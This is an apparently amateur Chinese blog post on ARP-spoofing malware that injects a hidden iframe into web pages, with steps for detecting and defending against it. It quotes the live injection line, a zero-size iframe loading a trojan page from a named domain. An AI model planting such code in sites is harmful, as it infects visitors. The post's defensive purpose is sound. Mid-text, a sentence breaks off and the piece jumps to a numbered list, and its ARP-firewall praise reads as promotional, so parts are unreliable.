ARP欺骗病毒，网页“篡改”，注入iframe代码！

---------------权威资料看这里---------------

清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组
《ARP 欺骗网页劫持攻击分析》PDF文件，直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf

---------------民间资料看这里---------------

网 站突然出现访问迟钝，并且打开之后杀毒软件立即提示含有木马病毒,IE提示下载安装Microsoft Data Access...信息。从IE查看页面的源代码，在网页的源代码中加入了<iframe src=http://xf.jebooo.com/t.htm width=0
height=0></iframe> 嵌套框架网页，该网页执行木马程序......

所以估计是服务器被人攻陷了，所有文件代码被加了此行代码，于是FTP上去，但下载文件下来查看却没有该代码。怎么回事呢？原来是机房局域网中有服务器中ARP病毒了，模拟网关进行欺骗，拦截Http数据包自动加入iframe代码。

那么什么是"ARP欺骗"呢？

首先，ARP的意思是Address Resolution Protocol（地址解析协议），它是一个位于TCP/IP协议栈中的低层协议，负责将某个IP地址解析成对应的MAC地址。

从影响网络连接通畅的方式来看，ARP欺骗分为二种，一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。

第一种ARP欺骗的原理是----截获网关数据。它通知路由器一系列错误的内网MAC地址，并按照一定的频率不断进行，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址，造成正常PC

无法收到信息。

第二种ARP欺骗的原理是----伪造网关，ARP网关欺骗。它的原理是建立假网关，让被它欺骗的PC向假网关发数据，而不是通过正常的路由器途径上网。在PC看来，就是上不了网了，"网络掉线了"。

ARP欺骗木马只需成功感染一台电脑，就可能导致整个局域网都无法上网，严重的甚至可能带来整个网络的瘫痪。

而本次我的网站服务器所在的托管机房同一局域网中的某台服??设置好你的路由，确保ip地址能到达合法的路径。（静态配置路由ARP条目），注意，使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的ip包中获得一个rarp请求，然后检查ARP响应的真实性。
8、管理员定期轮询，检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下，ARP的欺骗有可能导致陷阱包丢失。

解决方案：

1、针对中毒服务器
检查服务器是否中了ARP欺骗木马病毒
"CTRL"+"ALT"+"Delete"键打开"Windows任务管理器"窗口，查看有没有"MIR0.dat"的进程，如果有，表示中毒了，需要立即"结束该进程"。
其他变种要安装最新的杀毒软件或专杀工具查杀。

2、针对受影响服务器

检查局域网内感染ARP欺骗木马病毒的计算机

"开始"菜单"运行""cmd"打开MSDOS窗口，输入"ipconfig"获得"Default Gateway"默认网关。

继续执行命令"arp -a"，查看默认网关IP对应的"Physical Address"值，在网络正常时这就是网关的正确物理地址，在网络受" ARP 欺骗"木马影响而不正常时，它就是木马所在计算机的网卡物理地址。也可以扫描本子网内

的全部IP地址，然后再查ARP表。如果有一个 IP 对应的物理地址与网关的相同，那么这个IP地址和物理地址就是中毒计算机的IP地址和网卡物理地址。

安装一个arp防火墙也可以防.

可以用360安全卫士自带的ARP病毒防火墙。

ARP防火墙通过在系统内核层拦截虚假ARP数据包以及主动通告网关本机正确的MAC地址，可以保障数据流向正确，不经过第三者，从而保证通讯数据安全、保证网络畅通、保证通讯数据不受第三者控制，从而完美的解决上述所有问

题。

ARP防火墙九大功能
    1. 拦截ARP攻击。
        (A) 在系统内核层拦截外部虚假ARP数据包，保障系统不受ARP欺骗、ARP攻击影响，保持网络畅通及通讯安全；
        (B) 在系统内核层拦截本机对外的ARP攻击数据包，以减少感染恶意程序后对外攻击给用户带来的麻烦；
    2. 拦截IP冲突。在系统内核层拦截IP冲突数据包，保障系统不受IP冲突攻击的影响；
    3. Dos攻击抑制。在系统内核层拦截本机对外的TCP SYN/UDP/ICMP/ARP DoS攻击数据包，定位恶意发动DoS攻击的程序，从而保证网络的畅通；
    4. 安全模式。除了网关外，不响应其它机器发送的ARP Request，达到隐身效果，减少受到ARP攻击的几率；
    5. ARP数据分析。分析本机接收到的所有ARP数据包，掌握网络动态，找出潜在的攻击者或中毒的机器；
    6. 监测ARP缓存。自动监测本机ARP缓存表，如发现网关MAC地址被恶意程序篡改，将报警并自动修复，以保持网络畅通及通讯安全；
    7. 主动防御。主动与网关保持通讯，通告网关正确的MAC地址，以保持网络畅通及通讯安全；
    8. 追踪攻击者。发现攻击行为后，自动快速锁定攻击者IP地址；
    9. 查杀ARP病毒。发现本机有对外攻击行为时，自动定位本机感染的恶意程序、病毒程序；

3、针对网站访问者

网站访问者在网站解决ARP病毒前没有别的方式，但是如果非要访问该网站的话，千万不能执行下载安装任何插件ActiveX，并且可以把那个恶意网站加入Hosts文件。

查找系统的hosts文件所在目录，Windows 2003在%windir%\system32\drivers\etc\hosts目录下

首先查看源文件找到iframe嵌入的网站域名

在该文件中加入一行
127.0.0.1 xf.jebooo.com

如果hosts存取拒绝，可以

使用方法：
开始==》运行==》输入cmd后回车==》复制代码框内容到CMD窗口，回车执行。

attrib -r -a -s -h %windir%\system32\drivers\etc\hosts
去掉文件属性，然后再修改